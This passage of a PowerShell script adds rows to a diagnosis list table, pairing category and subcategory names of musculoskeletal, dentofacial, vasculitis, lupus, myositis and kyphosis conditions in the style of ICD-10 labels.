$DiagnosisList.Rows.Add("Effusion, elbow","Effusion, right elbow") + $null = $DiagnosisList.Rows.Add("Effusion, elbow","Effusion, left elbow") + $null = $DiagnosisList.Rows.Add("Effusion, elbow","Effusion, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Effusion, wrist","Effusion, right wrist") + $null = $DiagnosisList.Rows.Add("Effusion, wrist","Effusion, left wrist") + $null = $DiagnosisList.Rows.Add("Effusion, wrist","Effusion, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Effusion, hand","Effusion, right hand") + $null = $DiagnosisList.Rows.Add("Effusion, hand","Effusion, left hand") + $null = $DiagnosisList.Rows.Add("Effusion, hand","Effusion, unspecified hand") + $null = $DiagnosisList.Rows.Add("Effusion, hip","Effusion, right hip") + $null = $DiagnosisList.Rows.Add("Effusion, hip","Effusion, left hip") + $null = $DiagnosisList.Rows.Add("Effusion, hip","Effusion, unspecified hip") + $null = $DiagnosisList.Rows.Add("Effusion, knee","Effusion, right knee") + $null = $DiagnosisList.Rows.Add("Effusion, knee","Effusion, left knee") + $null = $DiagnosisList.Rows.Add("Effusion, knee","Effusion, unspecified knee") + $null = $DiagnosisList.Rows.Add("Effusion, ankle and foot","Effusion, right ankle") + $null = $DiagnosisList.Rows.Add("Effusion, ankle and foot","Effusion, left ankle") + $null = $DiagnosisList.Rows.Add("Effusion, ankle and foot","Effusion, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Effusion, ankle and foot","Effusion, right foot") + $null = $DiagnosisList.Rows.Add("Effusion, ankle and foot","Effusion, left foot") + $null = $DiagnosisList.Rows.Add("Effusion, ankle and foot","Effusion, unspecified foot") + $null = $DiagnosisList.Rows.Add("Effusion, other site","Effusion, other site") + $null = $DiagnosisList.Rows.Add("Pain in joint","Pain in unspecified joint") + $null = $DiagnosisList.Rows.Add("Pain in shoulder","Pain in right shoulder") + $null = $DiagnosisList.Rows.Add("Pain in shoulder","Pain in left shoulder") + $null = $DiagnosisList.Rows.Add("Pain in shoulder","Pain in unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Pain in elbow","Pain in right elbow") + $null = $DiagnosisList.Rows.Add("Pain in elbow","Pain in left elbow") + $null = $DiagnosisList.Rows.Add("Pain in elbow","Pain in unspecified elbow") + $null = $DiagnosisList.Rows.Add("Pain in wrist","Pain in right wrist") + $null = $DiagnosisList.Rows.Add("Pain in wrist","Pain in left wrist") + $null = $DiagnosisList.Rows.Add("Pain in wrist","Pain in unspecified wrist") + $null = $DiagnosisList.Rows.Add("Pain in joints of hand","Pain in joints of right hand") + $null = $DiagnosisList.Rows.Add("Pain in joints of hand","Pain in joints of left hand") + $null = $DiagnosisList.Rows.Add("Pain in joints of hand","Pain in joints of unspecified hand") + $null = $DiagnosisList.Rows.Add("Pain in hip","Pain in right hip") + $null = $DiagnosisList.Rows.Add("Pain in hip","Pain in left hip") + $null = $DiagnosisList.Rows.Add("Pain in hip","Pain in unspecified hip") + $null = $DiagnosisList.Rows.Add("Pain in knee","Pain in right knee") + $null = $DiagnosisList.Rows.Add("Pain in knee","Pain in left knee") + $null = $DiagnosisList.Rows.Add("Pain in knee","Pain in unspecified knee") + $null = $DiagnosisList.Rows.Add("Pain in ankle and joints of foot","Pain in right ankle and joints of right foot") + $null = $DiagnosisList.Rows.Add("Pain in ankle and joints of foot","Pain in left ankle and joints of left foot") + $null = $DiagnosisList.Rows.Add("Pain in ankle and joints of foot","Pain in unspecified ankle and joints of unspecified foot") + $null = $DiagnosisList.Rows.Add("Stiffness of joint, not elsewhere classified","Stiffness of unspecified joint, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of shoulder, not elsewhere classified","Stiffness of right shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of shoulder, not elsewhere classified","Stiffness of left shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of shoulder, not elsewhere classified","Stiffness of unspecified shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of elbow, not elsewhere classified","Stiffness of right elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of elbow, not elsewhere classified","Stiffness of left elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of elbow, not elsewhere classified","Stiffness of unspecified elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of wrist, not elsewhere classified","Stiffness of right wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of wrist, not elsewhere classified","Stiffness of left wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of wrist, not elsewhere classified","Stiffness of unspecified wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of hand, not elsewhere classified","Stiffness of right hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of hand, not elsewhere classified","Stiffness of left hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of hand, not elsewhere classified","Stiffness of unspecified hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of hip, not elsewhere classified","Stiffness of right hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of hip, not elsewhere classified","Stiffness of left hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of hip, not elsewhere classified","Stiffness of unspecified hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of knee, not elsewhere classified","Stiffness of right knee, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of knee, not elsewhere classified","Stiffness of left knee, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of knee, not elsewhere classified","Stiffness of unspecified knee, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of ankle and foot, not elsewhere classified","Stiffness of right ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of ankle and foot, not elsewhere classified","Stiffness of left ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of ankle and foot, not elsewhere classified","Stiffness of unspecified ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of ankle and foot, not elsewhere classified","Stiffness of right foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of ankle and foot, not elsewhere classified","Stiffness of left foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Stiffness of ankle and foot, not elsewhere classified","Stiffness of unspecified foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Osteophyte","Osteophyte, unspecified joint") + $null = $DiagnosisList.Rows.Add("Osteophyte, shoulder","Osteophyte, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteophyte, shoulder","Osteophyte, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteophyte, shoulder","Osteophyte, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteophyte, elbow","Osteophyte, right elbow") + $null = $DiagnosisList.Rows.Add("Osteophyte, elbow","Osteophyte, left elbow") + $null = $DiagnosisList.Rows.Add("Osteophyte, elbow","Osteophyte, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Osteophyte, wrist","Osteophyte, right wrist") + $null = $DiagnosisList.Rows.Add("Osteophyte, wrist","Osteophyte, left wrist") + $null = $DiagnosisList.Rows.Add("Osteophyte, wrist","Osteophyte, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Osteophyte, hand","Osteophyte, right hand") + $null = $DiagnosisList.Rows.Add("Osteophyte, hand","Osteophyte, left hand") + $null = $DiagnosisList.Rows.Add("Osteophyte, hand","Osteophyte, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteophyte, hip","Osteophyte, right hip") + $null = $DiagnosisList.Rows.Add("Osteophyte, hip","Osteophyte, left hip") + $null = $DiagnosisList.Rows.Add("Osteophyte, hip","Osteophyte, unspecified hip") + $null = $DiagnosisList.Rows.Add("Osteophyte, knee","Osteophyte, right knee") + $null = $DiagnosisList.Rows.Add("Osteophyte, knee","Osteophyte, left knee") + $null = $DiagnosisList.Rows.Add("Osteophyte, knee","Osteophyte, unspecified knee") + $null = $DiagnosisList.Rows.Add("Osteophyte, ankle and foot","Osteophyte, right ankle") + $null = $DiagnosisList.Rows.Add("Osteophyte, ankle and foot","Osteophyte, left ankle") + $null = $DiagnosisList.Rows.Add("Osteophyte, ankle and foot","Osteophyte, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Osteophyte, ankle and foot","Osteophyte, right foot") + $null = $DiagnosisList.Rows.Add("Osteophyte, ankle and foot","Osteophyte, left foot") + $null = $DiagnosisList.Rows.Add("Osteophyte, ankle and foot","Osteophyte, unspecified foot") + $null = $DiagnosisList.Rows.Add("Osteophyte, vertebrae","Osteophyte, vertebrae") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders","Other specified joint disorders, unspecified joint") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, shoulder","Other specified joint disorders, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, shoulder","Other specified joint disorders, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, shoulder","Other specified joint disorders, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, elbow","Other specified joint disorders, right elbow") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, elbow","Other specified joint disorders, left elbow") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, elbow","Other specified joint disorders, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, wrist","Other specified joint disorders, right wrist") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, wrist","Other specified joint disorders, left wrist") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, wrist","Other specified joint disorders, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, hand","Other specified joint disorders, right hand") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, hand","Other specified joint disorders, left hand") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, hand","Other specified joint disorders, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, hip","Other specified joint disorders, right hip") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, hip","Other specified joint disorders, left hip") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, hip","Other specified joint disorders, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, knee","Other specified joint disorders, right knee") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, knee","Other specified joint disorders, left knee") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, knee","Other specified joint disorders, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, ankle and foot","Other specified joint disorders, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, ankle and foot","Other specified joint disorders, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified joint disorders, ankle and foot","Other specified joint disorders, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Joint disorder, unspecified","Joint disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Unspecified anomaly of jaw size") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Maxillary hyperplasia") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Maxillary hypoplasia") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Mandibular hyperplasia") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Mandibular hypoplasia") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Macrogenia") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Microgenia") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Excessive tuberosity of jaw") + $null = $DiagnosisList.Rows.Add("Major anomalies of jaw size","Other specified anomalies of jaw size") + $null = $DiagnosisList.Rows.Add("Anomalies of jaw-cranial base relationship","Unspecified anomaly of jaw-cranial base relationship") + $null = $DiagnosisList.Rows.Add("Anomalies of jaw-cranial base relationship","Maxillary asymmetry") + $null = $DiagnosisList.Rows.Add("Anomalies of jaw-cranial base relationship","Other jaw asymmetry") + $null = $DiagnosisList.Rows.Add("Anomalies of jaw-cranial base relationship","Other specified anomalies of jaw-cranial base relationship") + $null = $DiagnosisList.Rows.Add("Anomalies of dental arch relationship","Unspecified anomaly of dental arch relationship") + $null = $DiagnosisList.Rows.Add("Malocclusion, Angle's class","Malocclusion, Angle's class I") + $null = $DiagnosisList.Rows.Add("Malocclusion, Angle's class","Malocclusion, Angle's class II") + $null = $DiagnosisList.Rows.Add("Malocclusion, Angle's class","Malocclusion, Angle's class III") + $null = $DiagnosisList.Rows.Add("Malocclusion, Angle's class","Malocclusion, Angle's class, unspecified") + $null = $DiagnosisList.Rows.Add("Open occlusal relationship","Open anterior occlusal relationship") + $null = $DiagnosisList.Rows.Add("Open occlusal relationship","Open posterior occlusal relationship") + $null = $DiagnosisList.Rows.Add("Excessive horizontal overlap","Excessive horizontal overlap") + $null = $DiagnosisList.Rows.Add("Reverse articulation","Reverse articulation") + $null = $DiagnosisList.Rows.Add("Anomalies of interarch distance","Anomalies of interarch distance") + $null = $DiagnosisList.Rows.Add("Other anomalies of dental arch relationship","Other anomalies of dental arch relationship") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Unspecified anomaly of tooth position of fully erupted tooth or teeth") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Crowding of fully erupted teeth") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Excessive spacing of fully erupted teeth") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Horizontal displacement of fully erupted tooth or teeth") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Vertical displacement of fully erupted tooth or teeth") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Rotation of fully erupted tooth or teeth") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Insufficient interocclusal distance of fully erupted teeth (ridge)") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Excessive interocclusal distance of fully erupted teeth") + $null = $DiagnosisList.Rows.Add("Anomalies of tooth position of fully erupted tooth or teeth","Other anomalies of tooth position of fully erupted tooth or teeth") + $null = $DiagnosisList.Rows.Add("Malocclusion, unspecified","Malocclusion, unspecified") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Dentofacial functional abnormalities, unspecified") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Abnormal jaw closure") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Limited mandibular range of motion") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Deviation in opening and closing of the mandible") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Insufficient anterior guidance") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Centric occlusion maximum intercuspation discrepancy") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Non-working side interference") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Lack of posterior occlusal support") + $null = $DiagnosisList.Rows.Add("Dentofacial functional abnormalities","Other dentofacial functional abnormalities") + $null = $DiagnosisList.Rows.Add("Temporomandibular joint disorder, unspecified","Right temporomandibular joint disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Temporomandibular joint disorder, unspecified","Left temporomandibular joint disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Temporomandibular joint disorder, unspecified","Bilateral temporomandibular joint disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Temporomandibular joint disorder, unspecified","Unspecified temporomandibular joint disorder, unspecified side") + $null = $DiagnosisList.Rows.Add("Adhesions and ankylosis of temporomandibular joint","Adhesions and ankylosis of right temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Adhesions and ankylosis of temporomandibular joint","Adhesions and ankylosis of left temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Adhesions and ankylosis of temporomandibular joint","Adhesions and ankylosis of bilateral temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Adhesions and ankylosis of temporomandibular joint","Adhesions and ankylosis of temporomandibular joint, unspecified side") + $null = $DiagnosisList.Rows.Add("Arthralgia of temporomandibular joint","Arthralgia of right temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Arthralgia of temporomandibular joint","Arthralgia of left temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Arthralgia of temporomandibular joint","Arthralgia of bilateral temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Arthralgia of temporomandibular joint","Arthralgia of temporomandibular joint, unspecified side") + $null = $DiagnosisList.Rows.Add("Articular disc disorder of temporomandibular joint","Articular disc disorder of right temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Articular disc disorder of temporomandibular joint","Articular disc disorder of left temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Articular disc disorder of temporomandibular joint","Articular disc disorder of bilateral temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Articular disc disorder of temporomandibular joint","Articular disc disorder of temporomandibular joint, unspecified side") + $null = $DiagnosisList.Rows.Add("Other specified disorders of temporomandibular joint","Other specified disorders of temporomandibular joint") + $null = $DiagnosisList.Rows.Add("Dental alveolar anomalies","Unspecified alveolar anomaly") + $null = $DiagnosisList.Rows.Add("Dental alveolar anomalies","Alveolar maxillary hyperplasia") + $null = $DiagnosisList.Rows.Add("Dental alveolar anomalies","Alveolar mandibular hyperplasia") + $null = $DiagnosisList.Rows.Add("Dental alveolar anomalies","Alveolar maxillary hypoplasia") + $null = $DiagnosisList.Rows.Add("Dental alveolar anomalies","Alveolar mandibular hypoplasia") + $null = $DiagnosisList.Rows.Add("Dental alveolar anomalies","Other specified alveolar anomalies") + $null = $DiagnosisList.Rows.Add("Other dentofacial anomalies","Anterior soft tissue impingement") + $null = $DiagnosisList.Rows.Add("Other dentofacial anomalies","Posterior soft tissue impingement") + $null = $DiagnosisList.Rows.Add("Other dentofacial anomalies","Other dentofacial anomalies") + $null = $DiagnosisList.Rows.Add("Dentofacial anomaly, unspecified","Dentofacial anomaly, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of jaws","Developmental disorders of jaws") + $null = $DiagnosisList.Rows.Add("Other diseases of jaws","Giant cell granuloma, central") + $null = $DiagnosisList.Rows.Add("Other diseases of jaws","Inflammatory conditions of jaws") + $null = $DiagnosisList.Rows.Add("Other diseases of jaws","Alveolitis of jaws") + $null = $DiagnosisList.Rows.Add("Other and unspecified cysts of jaw","Unspecified cyst of jaw") + $null = $DiagnosisList.Rows.Add("Other and unspecified cysts of jaw","Other cysts of jaw") + $null = $DiagnosisList.Rows.Add("Periradicular pathology associated with previous endodontic treatment","Perforation of root canal space due to endodontic treatment") + $null = $DiagnosisList.Rows.Add("Periradicular pathology associated with previous endodontic treatment","Endodontic overfill") + $null = $DiagnosisList.Rows.Add("Periradicular pathology associated with previous endodontic treatment","Endodontic underfill") + $null = $DiagnosisList.Rows.Add("Periradicular pathology associated with previous endodontic treatment","Other periradicular pathology associated with previous endodontic treatment") + $null = $DiagnosisList.Rows.Add("Endosseous dental implant failure","Osseointegration failure of dental implant") + $null = $DiagnosisList.Rows.Add("Endosseous dental implant failure","Post-osseointegration biological failure of dental implant") + $null = $DiagnosisList.Rows.Add("Endosseous dental implant failure","Post-osseointegration mechanical failure of dental implant") + $null = $DiagnosisList.Rows.Add("Endosseous dental implant failure","Other endosseous dental implant failure") + $null = $DiagnosisList.Rows.Add("Other specified diseases of jaws","Other specified diseases of jaws") + $null = $DiagnosisList.Rows.Add("Disease of jaws, unspecified","Disease of jaws, unspecified") + $null = $DiagnosisList.Rows.Add("Polyarteritis nodosa and related conditions","Polyarteritis nodosa") + $null = $DiagnosisList.Rows.Add("Polyarteritis nodosa and related conditions","Polyarteritis with lung involvement [Churg-Strauss]") + $null = $DiagnosisList.Rows.Add("Polyarteritis nodosa and related conditions","Juvenile polyarteritis") + $null = $DiagnosisList.Rows.Add("Polyarteritis nodosa and related conditions","Mucocutaneous lymph node syndrome [Kawasaki]") + $null = $DiagnosisList.Rows.Add("Polyarteritis nodosa and related conditions","Other conditions related to polyarteritis nodosa") + $null = $DiagnosisList.Rows.Add("Other necrotizing vasculopathies","Hypersensitivity angiitis") + $null = $DiagnosisList.Rows.Add("Other necrotizing vasculopathies","Thrombotic microangiopathy") + $null = $DiagnosisList.Rows.Add("Other necrotizing vasculopathies","Lethal midline granuloma") + $null = $DiagnosisList.Rows.Add("Wegener's granulomatosis","Wegener's granulomatosis without renal involvement") + $null = $DiagnosisList.Rows.Add("Wegener's granulomatosis","Wegener's granulomatosis with renal involvement") + $null = $DiagnosisList.Rows.Add("Aortic arch syndrome [Takayasu]","Aortic arch syndrome [Takayasu]") + $null = $DiagnosisList.Rows.Add("Giant cell arteritis with polymyalgia rheumatica","Giant cell arteritis with polymyalgia rheumatica") + $null = $DiagnosisList.Rows.Add("Other giant cell arteritis","Other giant cell arteritis") + $null = $DiagnosisList.Rows.Add("Microscopic polyangiitis","Microscopic polyangiitis") + $null = $DiagnosisList.Rows.Add("Other specified necrotizing vasculopathies","Other specified necrotizing vasculopathies") + $null = $DiagnosisList.Rows.Add("Necrotizing vasculopathy, unspecified","Necrotizing vasculopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus (SLE)","Drug-induced systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus with organ or system involvement","Systemic lupus erythematosus, organ or system involvement unspecified") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus with organ or system involvement","Endocarditis in systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus with organ or system involvement","Pericarditis in systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus with organ or system involvement","Lung involvement in systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus with organ or system involvement","Glomerular disease in systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus with organ or system involvement","Tubulo-interstitial nephropathy in systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus with organ or system involvement","Other organ or system involvement in systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Other forms of systemic lupus erythematosus","Other forms of systemic lupus erythematosus") + $null = $DiagnosisList.Rows.Add("Systemic lupus erythematosus, unspecified","Systemic lupus erythematosus, unspecified") + $null = $DiagnosisList.Rows.Add("Juvenile dermatomyositis","Juvenile dermatomyositis, organ involvement unspecified") + $null = $DiagnosisList.Rows.Add("Juvenile dermatomyositis","Juvenile dermatomyositis with respiratory involvement") + $null = $DiagnosisList.Rows.Add("Juvenile dermatomyositis","Juvenile dermatomyositis with myopathy") + $null = $DiagnosisList.Rows.Add("Juvenile dermatomyositis","Juvenile dermatomyositis without myopathy") + $null = $DiagnosisList.Rows.Add("Juvenile dermatomyositis","Juvenile dermatomyositis with other organ involvement") + $null = $DiagnosisList.Rows.Add("Other dermatomyositis","Other dermatomyositis, organ involvement unspecified") + $null = $DiagnosisList.Rows.Add("Other dermatomyositis","Other dermatomyositis with respiratory involvement") + $null = $DiagnosisList.Rows.Add("Other dermatomyositis","Other dermatomyositis with myopathy") + $null = $DiagnosisList.Rows.Add("Other dermatomyositis","Other dermatomyositis without myopathy") + $null = $DiagnosisList.Rows.Add("Other dermatomyositis","Other dermatomyositis with other organ involvement") + $null = $DiagnosisList.Rows.Add("Polymyositis","Polymyositis, organ involvement unspecified") + $null = $DiagnosisList.Rows.Add("Polymyositis","Polymyositis with respiratory involvement") + $null = $DiagnosisList.Rows.Add("Polymyositis","Polymyositis with myopathy") + $null = $DiagnosisList.Rows.Add("Polymyositis","Polymyositis with other organ involvement") + $null = $DiagnosisList.Rows.Add("Dermatopolymyositis, unspecified","Dermatopolymyositis, unspecified, organ involvement unspecified") + $null = $DiagnosisList.Rows.Add("Dermatopolymyositis, unspecified","Dermatopolymyositis, unspecified with respiratory involvement") + $null = $DiagnosisList.Rows.Add("Dermatopolymyositis, unspecified","Dermatopolymyositis, unspecified with myopathy") + $null = $DiagnosisList.Rows.Add("Dermatopolymyositis, unspecified","Dermatopolymyositis, unspecified without myopathy") + $null = $DiagnosisList.Rows.Add("Dermatopolymyositis, unspecified","Dermatopolymyositis, unspecified with other organ involvement") + $null = $DiagnosisList.Rows.Add("Systemic sclerosis [scleroderma]","Progressive systemic sclerosis") + $null = $DiagnosisList.Rows.Add("Systemic sclerosis [scleroderma]","CR(E)ST syndrome") + $null = $DiagnosisList.Rows.Add("Systemic sclerosis [scleroderma]","Systemic sclerosis induced by drug and chemical") + $null = $DiagnosisList.Rows.Add("Other forms of systemic sclerosis","Systemic sclerosis with lung involvement") + $null = $DiagnosisList.Rows.Add("Other forms of systemic sclerosis","Systemic sclerosis with myopathy") + $null = $DiagnosisList.Rows.Add("Other forms of systemic sclerosis","Systemic sclerosis with polyneuropathy") + $null = $DiagnosisList.Rows.Add("Other forms of systemic sclerosis","Other systemic sclerosis") + $null = $DiagnosisList.Rows.Add("Systemic sclerosis, unspecified","Systemic sclerosis, unspecified") + $null = $DiagnosisList.Rows.Add("Sicca syndrome [Sjogren]","Sicca syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Sicca syndrome [Sjogren]","Sicca syndrome with keratoconjunctivitis") + $null = $DiagnosisList.Rows.Add("Sicca syndrome [Sjogren]","Sicca syndrome with lung involvement") + $null = $DiagnosisList.Rows.Add("Sicca syndrome [Sjogren]","Sicca syndrome with myopathy") + $null = $DiagnosisList.Rows.Add("Sicca syndrome [Sjogren]","Sicca syndrome with tubulo-interstitial nephropathy") + $null = $DiagnosisList.Rows.Add("Sicca syndrome [Sjogren]","Sicca syndrome with other organ involvement") + $null = $DiagnosisList.Rows.Add("Other overlap syndromes","Other overlap syndromes") + $null = $DiagnosisList.Rows.Add("Behcet's disease","Behcet's disease") + $null = $DiagnosisList.Rows.Add("Polymyalgia rheumatica","Polymyalgia rheumatica") + $null = $DiagnosisList.Rows.Add("Diffuse (eosinophilic) fasciitis","Diffuse (eosinophilic) fasciitis") + $null = $DiagnosisList.Rows.Add("Multifocal fibrosclerosis","Multifocal fibrosclerosis") + $null = $DiagnosisList.Rows.Add("Relapsing panniculitis [Weber-Christian]","Relapsing panniculitis [Weber-Christian]") + $null = $DiagnosisList.Rows.Add("Hypermobility syndrome","Hypermobility syndrome") + $null = $DiagnosisList.Rows.Add("Other specified systemic involvement of connective tissue","Other specified systemic involvement of connective tissue") + $null = $DiagnosisList.Rows.Add("Systemic involvement of connective tissue, unspecified","Systemic involvement of connective tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Systemic disorders of connective tissue in diseases classified elsewhere","Dermato(poly)myositis in neoplastic disease") + $null = $DiagnosisList.Rows.Add("Systemic disorders of connective tissue in diseases classified elsewhere","Arthropathy in neoplastic disease") + $null = $DiagnosisList.Rows.Add("Systemic disorders of connective tissue in diseases classified elsewhere","Hemophilic arthropathy") + $null = $DiagnosisList.Rows.Add("Systemic disorders of connective tissue in diseases classified elsewhere","Arthropathy in other blood disorders") + $null = $DiagnosisList.Rows.Add("Systemic disorders of connective tissue in diseases classified elsewhere","Arthropathy in hypersensitivity reactions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Systemic disorders of connective tissue in diseases classified elsewhere","Systemic disorders of connective tissue in other diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Postural kyphosis","Postural kyphosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Postural kyphosis","Postural kyphosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Postural kyphosis","Postural kyphosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Postural kyphosis","Postural kyphosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other secondary kyphosis","Other secondary kyphosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Other secondary kyphosis","Other secondary kyphosis, cervical region") + $null = $DiagnosisList.Rows.Add("Other secondary kyphosis","Other secondary kyphosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other secondary kyphosis","Other secondary kyphosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Other secondary kyphosis","Other secondary kyphosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Unspecified kyphosis","Unspecified kyphosis, cervical region") + $null = $DiagnosisList.Rows.Add("Unspecified kyphosis","Unspecified kyphosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Unspecified kyphosis","Unspecified kyphosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Unspecified kyphosis","Unspecified kyphosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Unspecified kyphosis","Unspecified kyphosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Other kyphosis","Other kyphosis, cervical region") + $null = $DiagnosisList.Rows.Add("Other kyphosis","Other kyphosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other kyphosis","Other kyphosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Other kyphosis","Other kyphosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other kyphosis","Other kyphosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Flatback syndrome","Flatback syndrome, site unspecified") + $null = $DiagnosisList.Rows.Add("Flatback syndrome","Flatback syndrome, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Flatback syndrome","Flatback syndrome, lumbar region") + $null = $DiagnosisList.Rows.Add("Flatback syndrome","Flatback syndrome, lumbosacral region") + $null = 